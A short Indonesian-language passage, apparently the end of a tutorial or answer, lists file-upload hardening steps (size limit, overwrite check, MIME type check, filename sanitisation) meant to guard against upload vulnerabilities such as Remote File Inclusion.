2. Batas Ukuran File: Memastikan file tidak lebih besar dari 5MB.
3. Periksa Apakah File Sudah Ada: Mencegah penimpaan file yang sudah ada.
4. Periksa Tipe MIME: Memastikan tipe MIME file sesuai dengan yang diizinkan.
5. Sanitasi Nama File: Menghapus karakter berbahaya dari nama file.

Peningkatan ini akan membantu melindungi aplikasi Anda dari berbagai kerentanan unggahan file, termasuk serangan Remote File Inclusion (RFI).